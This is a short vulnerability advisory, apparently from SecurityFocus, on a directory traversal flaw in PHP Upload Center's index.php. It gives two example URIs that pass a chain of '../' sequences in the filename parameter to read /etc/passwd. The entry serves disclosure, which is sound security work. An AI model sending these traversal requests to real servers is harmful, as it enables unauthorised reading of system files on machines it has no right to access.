PHP Upload Center Index.PHP Directory Traversal Vulnerability

An exploit is not required.

Example URI have been provided:

http://www.example.com/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus